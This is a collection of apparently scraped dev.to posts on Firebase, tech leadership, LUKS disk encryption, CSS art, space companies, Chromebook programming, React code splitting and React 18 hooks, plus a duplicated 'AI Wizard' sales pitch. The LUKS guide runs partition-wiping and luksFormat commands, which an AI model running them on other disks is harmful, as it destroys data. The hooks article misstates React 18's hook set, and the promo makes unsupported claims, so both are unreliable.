1,881,392 | All about Google Firebase | Let’s chat about one of the coolest tools in the app development universe: Google Firebase. Whether... | 27,645 | 2024-06-08T16:31:40 | https://dev.to/shafayeat/all-about-google-firebase-2onk | firebase, webdev, beginners, tutorial |
Let’s chat about one of the coolest tools in the app development universe: **Google Firebase**. Whether you’re crafting a web app, mobile app, or both, Firebase is your secret weapon. So, grab your favorite non-alcoholic drink (because let's face it, alcohol might remind you of your ex and that's never good for coding), get comfy, and let’s explore what makes Firebase so awesome and how you can start using it!
**<u>What is Google Firebase?</u>**
Google Firebase is a comprehensive app development platform that provides a suite of cloud-based tools and services. It helps developers build high-quality apps, improve app quality, and grow their user base. Here’s a quick overview of what Firebase offers:

**Real-time Database:** Store and sync data between your users in real-time.
**Authentication:** Easy-to-use SDKs and backend services for authenticating users.
**Cloud Firestore:** A flexible, scalable database for mobile, web, and server development.
**Cloud Functions:** Run backend code in response to events triggered by Firebase features and HTTPS requests.
**Hosting:** Fast and secure web hosting for your static and dynamic content.
**Analytics:** Gain insights into your app’s usage and performance.
**Messaging:** Engage users with targeted push notifications.
---
**<u>Getting Started with Firebase</u>**
Setting up Firebase is a breeze. Here’s a quick guide to get you started:
**1)Create a Firebase Project:**
- Go to the Firebase Console.
- Click on “_Add Project_” and follow the on-screen instructions to set up your project.
**2)Add Firebase to Your App:**
- For a web app, you'll need to include Firebase SDK scripts in your HTML file.
- For mobile apps, follow the specific setup instructions for Android or iOS provided in the Firebase console.
**3)Initialize Firebase:**
Once you’ve added Firebase to your app, initialize it with your project’s configuration. Here’s an example for a web app:
**_- Javascript_**
```
// Your web app's Firebase configuration
const firebaseConfig = {
apiKey: "YOUR_API_KEY",
authDomain: "YOUR_PROJECT_ID.firebaseapp.com",
projectId: "YOUR_PROJECT_ID",
storageBucket: "YOUR_PROJECT_ID.appspot.com",
messagingSenderId: "YOUR_MESSAGING_SENDER_ID",
appId: "YOUR_APP_ID"
};
// Initialize Firebase
firebase.initializeApp(firebaseConfig);
---
```
**<u>Using Firebase CLI</u>**
The Firebase Command Line Interface (CLI) is a powerful tool that simplifies many Firebase tasks. Here’s how to get started:
**1)Install Firebase CLI:**
- You’ll need Node.js and npm installed. Then, run the following command:
```
npm install -g firebase-tools
```
**2)Login to Firebase:**
- Authenticate your Firebase account by running:
```
firebase login
```
**3)Initialize Your Project:**
- Navigate to your project directory and run:
```
firebase init
```
- Follow the prompts to set up Firebase Hosting, Cloud Functions, or other Firebase features.
**4)Deploy Your App:**
- When you’re ready to deploy your app, use:
```
firebase deploy
```
**_BA-BOOM!!_** This will push your code to Firebase, making it live for the world to see!
---
Share your thoughts and let's help a fellow DEV member out! We take care about your thoughts💚
| shafayeat |
1,881,450 | Tech Leadership Decoded: From Watts Humphrey to Elon Musk and the Power of Storytelling | In the fast-paced world of software engineering, being a great leader is like being a skilled captain... | 0 | 2024-06-08T17:15:27 | https://dev.to/vm_one1/tech-leadership-decoded-from-watts-humphrey-to-elon-musk-balancing-tech-chops-people-skills-and-the-power-of-storytelling-h29 | agile, software, leadership, elon | In the fast-paced world of software engineering, being a great leader is like being a skilled captain navigating a ship. When things are smooth sailing, it's all about having a clear vision and charting the course. But when storms hit, it's the captain's hands-on experience and technical knowledge that keep everyone afloat. It's the same in tech – leaders need a mix of technical skills and people skills to steer their teams through calm waters and rough seas.
**Watts Up with Technical Leadership?**
Watts Humphrey, a legend in software engineering and the "father of software quality," knew this all too well. He stressed that tech leaders need a deep understanding of how things work under the hood. This helps them earn their team's respect, tackle tricky problems, and explain things to both techies and non-techies alike. Think of it like this: you wouldn't want a car mechanic who can't tell a wrench from a screwdriver, right? Same goes for leading a software team.
**Leadership Styles: It's Not One-Size-Fits-All**
Just like there are different tools for different jobs, there are different leadership styles for different situations. The Situational Leadership Model gives us a handy way to think about this:
**Directing**: This is like being a coach on the sidelines, calling the plays for new or inexperienced teams.
**Coaching**: It's a mix of giving guidance and support, helping teams who are getting the hang of things but still need some help.
**Supporting**: This is about letting more experienced teams take the lead while still being there to offer a helping hand.
**Delegating**: For high-performing teams, it's about giving them the freedom to run the show while setting clear goals.
And it's not just about these four styles. Think of transformational leaders like Elon Musk, who paint a picture of an exciting future and get everyone pumped up to work towards it. Or even the "bull in a china shop" approach, which can be surprisingly effective when you need to shake things up quickly. The best leaders have a whole toolkit of styles and know when to use each one.
**Elon Musk: The Maverick of Tech Leadership**
Speaking of Elon Musk, he's a prime example of a transformational leader, always pushing the boundaries and challenging the status quo. His vision for the future is so captivating that he's basically a master storyteller. But he's also known for being demanding, which can sometimes lead to burnout. So, while his style works for some, it's a reminder that leadership is a balancing act. You need to push for innovation but also take care of your team.
**From Coding to Commanding: Stories from the Tech Trenches**
Satya Nadella (Microsoft): This guy's got the whole package – technical background, vision, and the ability to bring people together. He transformed Microsoft's culture and made some seriously smart moves, proving that tech smarts and leadership chops can go hand-in-hand.
Susan Wojcicki (YouTube): She started as an early Google employee and worked her way up to CEO of YouTube. Her secret? She's always adapted her leadership style to fit the needs of her team, showing that flexibility is key in the ever-changing tech world.
Carly Fiorina (HP): This is a bit of a cautionary tale. Fiorina was a brilliant businesswoman, but her lack of technical know-how caused some trouble during her time at HP. It's a reminder that even the sharpest minds need to understand the tech landscape.
Padmasree Warrior (Cisco & Motorola): This lady is a master of the hybrid approach – balancing big-picture strategy with the ability to get into the technical weeds when needed. She also knows how to build strong relationships and mentor her team, which are essential skills for any leader.
**Leveling Up: Leadership Skills for 3x-10x Engineers**
If you're a 3x or 10x engineer – you know, the one who can crank out code like nobody's business – and you're thinking about taking on a leadership role, there are a few things you'll need to add to your toolkit:
**Communication**: It's not just about explaining code anymore. You need to inspire people, sell your ideas, and get everyone on the same page.
**Collaboration**: Working with others is key. Be open to different perspectives, listen to your team, and find solutions that work for everyone.
**Delegation**: Trust your team to do their jobs, and give them the freedom to shine.
**Strategic Thinking**: Look beyond the code and think about the bigger picture. How does your work fit into the company's goals?
**Adaptability**: Tech is always changing, so you need to be able to roll with the punches and adjust your leadership style as needed.
**The Bottom Line**
Being a leader in software engineering isn't just about writing amazing code; it's about knowing how to inspire, motivate, and guide your team to success. Whether you're a seasoned manager or a rising star engineer, having the right mix of technical skills, people skills, and a willingness to adapt can make all the difference in steering your ship through any storm.
| vm_one1 |
1,881,449 | Criptografando um SSD/HDD manualmente no Linux com o CryptSetup (LUKS) | Criptografando um SSD/HDD manualmente no Linux com o CryptSetup (LUKS) disclaymer (opcoes e modos de... | 0 | 2024-06-08T17:13:13 | https://dev.to/0xjeanpierre/criptografando-um-ssdhdd-manualmente-no-linux-com-o-cryptsetup-luks-2k8c | linux | Criptografando um SSD/HDD manualmente no Linux com o CryptSetup (LUKS)
disclaymer (opcoes e modos de criptografar)
## 1. Identificar o disco
- op1 - pelo tamanho do disco
- op2 - caso tenha 2 discos iguais, usar o mount ou apenas desconectar um dos discos e ver qual é o novo
## 2. Criar partição a ser criptografada
2.1. precisei apagar as particoes existentes.
```
box@box:~$ sudo gdisk /dev/sdc
GPT fdisk (gdisk) version 1.0.6
The protective MBR's 0xEE partition is oversized! Auto-repairing.
Partition table scan:
MBR: protective
BSD: not present
APM: not present
GPT: present
Found valid GPT with protective MBR; using GPT.
Command (? for help): p
Disk /dev/sdc: 3907029168 sectors, 1.8 TiB
Model: Generic
Sector size (logical/physical): 512/4096 bytes
Disk identifier (GUID): 954C8903-2CD3-4EF4-B907-632776F3A1BC
Partition table holds up to 128 entries
Main partition table begins at sector 2 and ends at sector 33
First usable sector is 34, last usable sector is 3907029134
Partitions will be aligned on 2048-sector boundaries
Total free space is 3874242669 sectors (1.8 TiB)
Number Start (sector) End (sector) Size Code Name
1 2048 309247 150.0 MiB EF00 EFI system partition
2 309248 571391 128.0 MiB 0C01 Microsoft reserved ...
3 3874785280 3876812799 990.0 MiB 2700
4 3876812800 3904253951 13.1 GiB 2700
5 3904256000 3907004415 1.3 GiB 2700
Command (? for help): d
Partition number (1-5): 1
Command (? for help): d
Partition number (2-5): 2
Command (? for help): d
Partition number (3-5): 3
Command (? for help): d
Partition number (4-5): 4
Command (? for help): d
Using 5
```
## 2. Criando partição
```
Command (? for help): c
No partitions
Command (? for help): n
Partition number (1-128, default 1):
First sector (34-3907029134, default = 2048) or {+-}size{KMGTP}:
Last sector (2048-3907029134, default = 3907029134) or {+-}size{KMGTP}:
Current type is 8300 (Linux filesystem)
Hex code or GUID (L to show codes, Enter = 8300):
Changed type of partition to 'Linux filesystem'
Command (? for help): w
Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!
Do you want to proceed? (Y/N): Y
OK; writing new GUID partition table (GPT) to /dev/sdc.
The operation has completed successfully.
```
## 3. Formatando a partição para o formato LUKS
```
box@box:~$ sudo fdisk -l | grep "sdc"
Disk /dev/sdc: 1.82 TiB, 2000398934016 bytes, 3907029168 sectors
/dev/sdc1 2048 3907029134 3907027087 1.8T Linux filesystem
box@box:~$ sudo cryptsetup luksFormat /dev/sdc1
WARNING: Device /dev/sdc1 already contains a 'vfat' superblock signature.
WARNING!
========
This will overwrite data on /dev/sdc1 irrevocably.
Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdc1:
Verify passphrase:
```
## 4. Decriptografando
```
box@box:~$ sudo cryptsetup open /dev/sdc1 hd_swap
Enter passphrase for /dev/sdc1:
```
## 4.1 Listando partição descriptografada
```
box@box:~$ sudo fdisk -l | grep hd_swap
Disk /dev/mapper/hd_swap: 1.82 TiB, 2000381091328 bytes, 3906994319 sectors
```
## 5. Formatando
```
box@box:~$ sudo mkfs.ext4 /dev/mapper/hd_swap
mke2fs 1.46.2 (28-Feb-2021)
Creating filesystem with 488374272 4k blocks and 122332032 inodes
Filesystem UUID: 1af577e5-48a0-470d-a510-ddb9bc3c9935
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968,
102400000, 214990848
Allocating group tables: done
Writing inode tables: done
Creating journal (262144 blocks): done
Writing superblocks and filesystem accounting information: done
```
## 6. Montando a partição
```
box@box:~$ mkdir -pv /media/box/hd_swap
mkdir: created directory '/media/box/hd_swap'
box@box:~$ sudo mount /dev/mapper/hd_swap /media/box/hd_swap -v
mount: /dev/mapper/hd_swap mounted on /media/box/hd_swap.
```
| 0xjeanpierre |
1,881,448 | I tried Frontend Challenge: June Edition | This is a submission for Frontend Challenge v24.04.17, CSS Art: June. Inspiration I'm highlighting... | 0 | 2024-06-08T17:12:56 | https://dev.to/nextjswebdev/i-tried-frontend-challenge-june-edition-k3a | frontendchallenge, devchallenge, css | _This is a submission for [Frontend Challenge v24.04.17](https://dev.to/challenges/frontend-2024-05-29), CSS Art: June._
Inspiration
I'm highlighting simple, clean geometric shapes. I wanted to create something that looks both simple and beautiful.
## Demo
Here is my CSS Art:
You can see the full code on [GitHub](https://github.com/Nextjswebdev/dev_challenege) and [live demo](https://devchallenege1.netlify.app/) here.
## Journey
I am from India and was curious to participate in this dev challenge. My designing is not the best, but I always try to make it better.
I started by drawing some ideas on paper. Then I used CSS to make it real. I played around with properties like clip-path, transform, and animation.
I learned a lot about how powerful CSS can be. I'm proud of the animations I added. Next, I want to learn more about CSS Grid and Flexbox for more complex designs.
## What I Feel After Participating in This Challenge
This is the first time I completed a challenge, and it’s really an amazing feeling to submit this. I learned a lot. Thanks, DEV, for these types of challenges!
| nextjswebdev |
1,881,445 | Space Tech: The New Frontier of Private Companies in Space Exploration | Commercial Space Flights: Companies like SpaceX and Blue Origin are developing spacecraft to carry... | 0 | 2024-06-08T17:04:30 | https://dev.to/bingecoder89/space-tech-the-new-frontier-of-private-companies-in-space-exploration-173d | webdev, javascript, devops, ai | - **Commercial Space Flights**: Companies like SpaceX and Blue Origin are developing spacecraft to carry civilians into space, making space tourism a reality.
- **Satellite Deployment**: Private firms such as OneWeb and SpaceX (Starlink) are launching constellations of satellites to provide global internet coverage and improve communications infrastructure.
- **Space Stations**: Axiom Space and Bigelow Aerospace are working on building commercial space stations, which could serve as research hubs, hotels, or manufacturing facilities in orbit.
- **Mars Colonization**: SpaceX's ambitious plans to colonize Mars involve developing the Starship spacecraft, which aims to transport humans and cargo to the Red Planet.
- **Lunar Missions**: Companies like Astrobotic and Intuitive Machines are contracted by NASA under the Artemis program to deliver payloads to the Moon, paving the way for sustainable lunar exploration.
- **Space Mining**: Firms like Planetary Resources and Deep Space Industries are exploring the feasibility of mining asteroids for precious metals and water, potentially revolutionizing resource availability.
- **Reusable Rockets**: Innovations by SpaceX with the Falcon 9 and Blue Origin with the New Shepard have made rockets reusable, significantly reducing the cost of access to space.
- **Space Manufacturing**: Made In Space is developing technology to manufacture products in space, which can take advantage of microgravity to create materials that are difficult or impossible to produce on Earth.
- **Earth Observation**: Companies like Planet Labs and Maxar Technologies provide high-resolution satellite imagery for a range of applications, including environmental monitoring, disaster response, and urban planning.
- **Regulation and Policy**: As private companies expand their presence in space, there is an increasing need for international cooperation and regulation to ensure space is used sustainably and safely for all.
Happy Learning 🎉 | bingecoder89 |
1,881,444 | AI Wizard Review - Replace 18 Apps for 10X Business Growth | What is AI Wizard? AI Wizard is an all-in-one AI-based platform that offers a... | 0 | 2024-06-08T16:58:57 | https://dev.to/sifatbinr/ai-wizard-review-replace-18-apps-for-10x-business-growth-2330 | aitool, ai, aiwizardreview, effortlessmarketing | {% embed https://www.youtube.com/watch?v=lYvElvvR1Do %}
## What is AI Wizard?
AI Wizard is an all-in-one AI-based platform that offers a comprehensive suite of tools for various tasks including website creation, video production, graphic design, content creation, marketing content generation, and customer support. It claims to replace the need for 18 different complicated apps, potentially saving users a significant amount of money. With AI Wizard, users can access all these functionalities from a single central dashboard, making it a convenient solution for businesses and individuals looking to streamline their workflow and reduce costs.
## Features of AI Wizard
**Easy Website Builder:** AI Wizard simplifies website creation effortlessly. By entering a word or website link, it generates a professional-looking website in just one minute.
**Cool Video Maker:** Create captivating videos effortlessly with this feature. By typing in a single word, it produces videos that can pique viewers' interest in your endeavors.
**Fancy Graphics Creator:** Craft eye-catching images without the need for expertise. Utilizing intelligent computer tricks, AI Wizard helps you create visually appealing pictures that attract attention.
**Smart Image Generator:** Transform your ideas into appealing visuals effortlessly. This tool converts your thoughts into images that resonate with people, requiring no artistic skills – just your imagination.
**Quick Content Writer:** Writing content for your business is no longer a daunting task. AI Wizard assists you in crafting website copy or ads with just a few clicks, streamlining the process.
**Helpful ChatBot:** Meet your virtual assistant! The ChatBot interacts with visitors to your website, providing assistance whenever they need it.
**All-in-One Dashboard:** Forget about juggling multiple tools. AI Wizard consolidates all functionalities into one convenient interface, simplifying your workflow.
**No Extra Costs:** You pay for AI Wizard once, and that's it. Say goodbye to hidden charges or renewal fees – enjoy transparent pricing with no surprises.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
## Benefits of AI Wizard
**Quick and Effortless Website Creation:** Imagine effortlessly conveying a word to a friend, who then magically creates a stylish website for you in just a minute. AI Wizard simplifies website creation to the point where it's as easy as pie.
**Instant Fun Videos:** Think of AI Wizard as your reliable friend who effortlessly crafts captivating videos with just a single word. No need to stress – it's quick and enjoyable!
**Stress-Free Creation of Stunning Images:** Consider AI Wizard as your creative companion, effortlessly assisting you in producing eye-catching images without requiring any expertise in art. It's simple and impressive!
**Bringing Ideas to Life:** Share your exciting ideas with AI Wizard, and watch as they transform into captivating pictures that everyone will adore. It's like witnessing your imagination come alive without any hassle.
**Efficient Writing Assistance:** Composing content for your business becomes a breeze with AI Wizard. It's akin to having a writing companion that enhances the quality of your words without consuming much time.
**Friendly Chat Support:** Meet the ChatBot – your helpful assistant. It engages with visitors on your website, providing assistance whenever needed. It's like having a reliable friend always ready to ensure everyone's satisfaction.
**Centralized Hub for Everything:** Forget about using various tools scattered everywhere. AI Wizard consolidates everything into one convenient location, serving as your personal creative hub. It's like having all your essentials in one place without any confusion.
**Transparent Pricing:** Think of purchasing AI Wizard as acquiring a cool gadget. You make a one-time payment, and that's it – no additional charges or unexpected fees. It's like having complete clarity regarding your expenditure without any hidden surprises.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
## Pros of AI Wizard
**Cost-Efficient:** Eliminates the need for hiring professionals for various tasks like graphics design, copywriting, video creation, image creation, website development, and chatbot creation, saving significant costs.
**Time-Saving:** Streamlines workflow by providing all-in-one functionality, reducing the time spent on managing multiple tools.
**Convenience:** Offers a centralized dashboard for easy access to various tools, enhancing user experience and productivity.
**Creative Assistance:** Assists users in generating high-quality content, graphics, videos, and websites effortlessly, even without prior expertise.
**Customer Support:** Provides effective support to users, ensuring smooth operation and addressing any issues promptly.
**Transparent Pricing:** One-time payment model with no hidden charges or renewal fees, offering clarity and predictability in expenditure.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
## Cons of AI Wizard
**Learning Curve:** Users may require some time to familiarize themselves with the platform and its features.
**Dependency on Technology:** Reliance on AI technology means occasional updates and maintenance are necessary to ensure optimal performance.
**Compatibility Issues:** Some users may encounter compatibility issues with certain devices or software configurations.
**Limited Customization:** While AI Wizard offers convenience and efficiency, users may find limited customization options compared to specialized tools.
**Internet Dependence:** Since AI Wizard is an online platform, users need a stable internet connection for uninterrupted access and operation.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
| sifatbinr |
1,881,443 | AI Wizard Review - Replace 18 Apps for 10X Business Growth | What is AI Wizard? AI Wizard is an all-in-one AI-based platform that offers a... | 0 | 2024-06-08T16:58:56 | https://dev.to/sifatbinr/ai-wizard-review-replace-18-apps-for-10x-business-growth-bj9 | aitool, ai, aiwizardreview, effortlessmarketing | {% embed https://www.youtube.com/watch?v=lYvElvvR1Do %}
## What is AI Wizard?
AI Wizard is an all-in-one AI-based platform that offers a comprehensive suite of tools for various tasks including website creation, video production, graphic design, content creation, marketing content generation, and customer support. It claims to replace the need for 18 different complicated apps, potentially saving users a significant amount of money. With AI Wizard, users can access all these functionalities from a single central dashboard, making it a convenient solution for businesses and individuals looking to streamline their workflow and reduce costs.
## Features of AI Wizard
**Easy Website Builder:** AI Wizard simplifies website creation effortlessly. By entering a word or website link, it generates a professional-looking website in just one minute.
**Cool Video Maker:** Create captivating videos effortlessly with this feature. By typing in a single word, it produces videos that can pique viewers' interest in your endeavors.
**Fancy Graphics Creator:** Craft eye-catching images without the need for expertise. Utilizing intelligent computer tricks, AI Wizard helps you create visually appealing pictures that attract attention.
**Smart Image Generator:** Transform your ideas into appealing visuals effortlessly. This tool converts your thoughts into images that resonate with people, requiring no artistic skills – just your imagination.
**Quick Content Writer:** Writing content for your business is no longer a daunting task. AI Wizard assists you in crafting website copy or ads with just a few clicks, streamlining the process.
**Helpful ChatBot:** Meet your virtual assistant! The ChatBot interacts with visitors to your website, providing assistance whenever they need it.
**All-in-One Dashboard:** Forget about juggling multiple tools. AI Wizard consolidates all functionalities into one convenient interface, simplifying your workflow.
**No Extra Costs:** You pay for AI Wizard once, and that's it. Say goodbye to hidden charges or renewal fees – enjoy transparent pricing with no surprises.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
## Benefits of AI Wizard
**Quick and Effortless Website Creation:** Imagine effortlessly conveying a word to a friend, who then magically creates a stylish website for you in just a minute. AI Wizard simplifies website creation to the point where it's as easy as pie.
**Instant Fun Videos:** Think of AI Wizard as your reliable friend who effortlessly crafts captivating videos with just a single word. No need to stress – it's quick and enjoyable!
**Stress-Free Creation of Stunning Images:** Consider AI Wizard as your creative companion, effortlessly assisting you in producing eye-catching images without requiring any expertise in art. It's simple and impressive!
**Bringing Ideas to Life:** Share your exciting ideas with AI Wizard, and watch as they transform into captivating pictures that everyone will adore. It's like witnessing your imagination come alive without any hassle.
**Efficient Writing Assistance:** Composing content for your business becomes a breeze with AI Wizard. It's akin to having a writing companion that enhances the quality of your words without consuming much time.
**Friendly Chat Support:** Meet the ChatBot – your helpful assistant. It engages with visitors on your website, providing assistance whenever needed. It's like having a reliable friend always ready to ensure everyone's satisfaction.
**Centralized Hub for Everything:** Forget about using various tools scattered everywhere. AI Wizard consolidates everything into one convenient location, serving as your personal creative hub. It's like having all your essentials in one place without any confusion.
**Transparent Pricing:** Think of purchasing AI Wizard as acquiring a cool gadget. You make a one-time payment, and that's it – no additional charges or unexpected fees. It's like having complete clarity regarding your expenditure without any hidden surprises.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
## Pros of AI Wizard
**Cost-Efficient:** Eliminates the need for hiring professionals for various tasks like graphics design, copywriting, video creation, image creation, website development, and chatbot creation, saving significant costs.
**Time-Saving:** Streamlines workflow by providing all-in-one functionality, reducing the time spent on managing multiple tools.
**Convenience:** Offers a centralized dashboard for easy access to various tools, enhancing user experience and productivity.
**Creative Assistance:** Assists users in generating high-quality content, graphics, videos, and websites effortlessly, even without prior expertise.
**Customer Support:** Provides effective support to users, ensuring smooth operation and addressing any issues promptly.
**Transparent Pricing:** One-time payment model with no hidden charges or renewal fees, offering clarity and predictability in expenditure.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
## Cons of AI Wizard
**Learning Curve:** Users may require some time to familiarize themselves with the platform and its features.
**Dependency on Technology:** Reliance on AI technology means occasional updates and maintenance are necessary to ensure optimal performance.
**Compatibility Issues:** Some users may encounter compatibility issues with certain devices or software configurations.
**Limited Customization:** While AI Wizard offers convenience and efficiency, users may find limited customization options compared to specialized tools.
**Internet Dependence:** Since AI Wizard is an online platform, users need a stable internet connection for uninterrupted access and operation.
[<<< Click Here To Get Instant Access Now >>>](https://bit.ly/AIWizardLink)
| sifatbinr |
1,880,359 | Programming on a Budget: Leveraging the Power of Chromebooks | In a world where access to technology often defines opportunities, the pursuit of programming... | 0 | 2024-06-08T16:43:03 | https://dev.to/baraq/programming-on-a-budget-leveraging-the-power-of-chromebooks-2kd7 | webdev, programming, beginners, datascience |

In a world where access to technology often defines opportunities, the pursuit of programming skills can sometimes feel like an exclusive club reserved for those with high-end laptops and deep pockets. However, in this age of innovation, accessibility to coding resources should not be limited by financial restriction. Enter Chromebooks – the affordable, budget-friendly laptops that are leveling the playing field for aspiring programmers from all walks of life.
**Why You Should Consider Buying A Chromebook**
In the programming world, powerful hardware has traditionally been seen as essential for smooth development. However, the rise of cloud-based Integrated Development Environments (IDEs) is changing this dynamic, especially for Chromebook users. This shift allows the demanding tasks of code compilation and execution to be handled in the cloud, reducing the reliance on local hardware. As a result, even the most affordable Chromebooks can become effective programming tools, tapping into the full potential of cloud-based IDEs without being restricted by their hardware specifications.
In this article, I'll share my experience with it such as the programming languages and the IDEs i installed on it, and i promise to make an honest and unbiased review. I was gifted an HP chromebook (HP 11.6" HD Display Chromebook Laptop, Intel Celeron Processor N3350, 4GB RAM, 32GB eMMC) back in December 2021 when i started my web development journey. I was used to using a windows laptop and this came as a new adventure to me. I had to surf the internet, youtube most times on how to use and whether it is suitable for programming. Eventually i unlocked the power of the machine when i successfully installed Linux on it, this was how our love journey began.
The integration of Linux into Chromebooks significantly enhances their capabilities, particularly for developers. Visual Studio Code was the first IDE I installed, and it worked seamlessly, with no lag while writing HTML, CSS, and JavaScript. Installing React and various libraries also did not affect its performance, giving me an edge over some friends with low-spec Windows laptops. I also installed Python, which ran smoothly. The terminal made installations quick and easy.
Last year, I decided to explore data science and needed to install Jupyter Notebook to run my code. Initially, I had issues installing it due to its larger memory requirements, so I had to allocate more space to the Linux environment. Once installed, it worked well, though I noticed occasional hanging when running Visual Studio Code concurrently, mostly due to insufficient memory space. The last IDE I installed was IntelliJ IDEA for Java development. My experience was less favorable because I had nearly exhausted my memory and had multiple IDEs running. Though I had to uninstall Jupyter Notebook to make space for IntelliJ IDEA. Overall, I believe a Chromebook with more memory would handle these tasks more smoothly.
**Things You Should Consider Before Buying a Chromebook**
**1. Linux Compatibility:** The first thing to check is whether the Chromebook is compatible with Linux, as this greatly enhances its capabilities for programming. Without it, the Chromebook is akin to a car without an engine.
**2. Memory Space:** Opt for a model with larger memory space. My 32GB variant was insufficient for many tasks, so consider models with more storage.
**3. Screen Size**: If you are interested in web development, particularly frontend or UI design, choose a Chromebook with a larger screen size. A 13 or 14-inch screen is recommended, ensuring compatibility across various screen sizes.
In conclusion, Chromebooks can be a surprisingly powerful and affordable option for programming, especially when enhanced with Linux. My journey with an HP Chromebook demonstrated its capability to handle various programming tasks smoothly, from web development to data science. While there are some considerations to keep in mind, such as ensuring Linux compatibility, opting for larger memory, and choosing an appropriate screen size, the benefits make it a worthwhile investment. For anyone seeking a budget-friendly yet efficient programming laptop, a Chromebook is certainly worth considering.
| baraq |
1,881,442 | Are you new to c# Dev? | Are you new to c# development and looking for tutorials, guides or just help? I’m on the lookout for... | 0 | 2024-06-08T16:41:47 | https://dev.to/colhountech/are-you-new-to-c-dev-3b1l | webdev, csharp, tutorial, beginners | Are you new to c# development and looking for tutorials, guides or just help?
I’m on the lookout for aspiring students who want to learn your craft to review early and pre-release tutorials, games, tools and tips.
Follow and message me to get early access to all of the above. | colhountech |
1,881,441 | 🌐 Speed Up Your React Apps With Code Splitting | Today, we're going to explore how to speed up your React apps with code splitting. This will help... | 0 | 2024-06-08T16:38:42 | https://dev.to/shehzadhussain/speed-up-your-react-apps-with-code-splitting-57cg | webdev, javascript, react, programming | Today, we're going to explore **how to speed up your React apps with code splitting**. This will help improve your app's performance.
**Code splitting is crucial. It reduces the initial load time of your application.**
Many developers fail because they complicate the setup. In this article, we will explore a simple approach.
**
## What is Code Splitting in Routing?
**
Code splitting in routing is a powerful technique to optimize your React applications.
**It's breaking down your app’s routes into smaller chunks and loading them only when required.**
Your initial bundle size is smaller. You improve the performance of your application.
## Using lazy, Suspense, and react-router-dom
You can handle dynamic imports with lazy and Suspense. Using react-router-dom, you manage routing in your React application.
## lazy and Suspense
lazy lets you dynamically import a component.
Suspense allows you to show a fallback UI while the component is being loaded.
## react-router-dom
react-router-dom is a library for routing in React. It enables navigation between different components in a React application.
**
## Step-by-Step Example
**
**Install React Router DOM (if you haven't already)**:

**Create Route Components**:
Create files for your route or page components, e.g., home.js and about.js:


**You have to import by default the components.** Code splitting will work properly that way.
**Update the App Component**:
Modify app.js to use lazy, Suspense, and react-router-dom:

When you access the Home page, you only load the code of the Home page. The same way, when you access the About page.
If you have big pages, you will speed up the initial load of your app. You will only be loading the JavaScript of the initial page. You will only load the JavaScript of the other pages when you access them.
**
## Conclusion
**
Code splitting is an efficient way to optimize your application's performance.
By dynamically loading route components, you can ensure faster initial load times.
By mastering code splitting in React, you provide a better user experience.
**If you are building a big React app with multiple routes, implement this technique now! Your app will level up to the next level.** | shehzadhussain |
1,881,440 | A Deep Dive Into Hooks In React 18 | by Chidi Confidence In the dynamic realm of web development, React 18 emerges as a beacon of... | 0 | 2024-06-08T16:37:34 | https://blog.openreplay.com/a-deep-dive-into-hooks-in-react-18/ |
by [Chidi Confidence](https://blog.openreplay.com/authors/chidi-confidence)
<blockquote><em>
In the dynamic realm of web development, React 18 emerges as a beacon of innovation, introducing a plethora of features designed to empower developers and enhance the user experience. Among the noteworthy additions are four powerful hooks: `useTransition`, `useMutableSource`, `useDeferredValue`, and `useSyncExternalStore`. This comprehensive exploration delves into the intricacies of each hook, providing developers with a profound understanding of their functionality and usage.
</em></blockquote>
<div style="background-color:#efefef; border-radius:8px; padding:10px; display:block;">
<hr/>
<h3><em>Session Replay for Developers</em></h3>
<p><em>Uncover frustrations, understand bugs and fix slowdowns like never before with <strong><a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a></strong> — an open-source session replay suite for developers. It can be <strong>self-hosted</strong> in minutes, giving you complete control over your customer data.</em></p>
<img alt="OpenReplay" style="margin-top:5px; margin-bottom:5px;" width="768" height="400" src="https://raw.githubusercontent.com/openreplay/openreplay/main/static/openreplay-git-hero.svg" class="astro-UXNKDZ4E" loading="lazy" decoding="async">
<p><em>Happy debugging! <a href="https://openreplay.com" target="_blank">Try using OpenReplay today.</a></em><p>
<hr/>
</div>
[React's Version 18](https://legacy.reactjs.org/blog/2022/03/29/react-v18.html) represents a significant evolution in the React ecosystem, bringing forth improvements in performance, rendering, and state management. It introduces features that simplify development workflows and pave the way for novel approaches to building user interfaces. The release focuses on equipping developers with tools to create more responsive, efficient, and dynamic web applications.
### Benefits of Version 18 Hooks
Explore the following unique benefits for elevated development experiences:
* [`useTransition`](https://legacy.reactjs.org/docs/hooks-reference.html#usetransition): Enhances the creation of smooth and responsive user interfaces by facilitating graceful transitions between different states. This hook offers developers control over when should commit the transition, empowering them to prioritize rendering or user interactions based on their specific needs.
* [`useMutableSource`](https://github.com/reactjs/rfcs/blob/main/text/0147-use-mutable-source.md): Facilitates seamless integration with external data sources, empowering to interact with mutable data without triggering unnecessary re-renders. This is particularly valuable in scenarios where the data source can be mutated without necessitating a complete re-render of the component tree.
* [`useDeferredValue`](https://legacy.reactjs.org/docs/hooks-reference.html#usedeferredvalue): Optimizes performance by deferring certain updates until the browser is idle. It is beneficial in scenarios where specific updates are not time-sensitive, allowing them to be delayed to enhance the overall user experience.
* [`useSyncExternalStore`](https://legacy.reactjs.org/docs/hooks-reference.html#usesyncexternalstore): Streamlines synchronization between React state and external state management systems. It proves valuable in scenarios where external stores, such as [React-Redux](https://react-redux.js.org/) or [MobX](https://mobx.js.org/react-integration.html), require alignment with internal state for seamless coordination.
## `useTransition`
The `useTransition` hook is a relatively new addition to the collection of hooks introduced in version 18. It is designed to manage complex UI transitions by allowing you to defer the rendering of certain components. Doing so helps prevent performance bottlenecks and improves the user experience during intense updates or transitions.
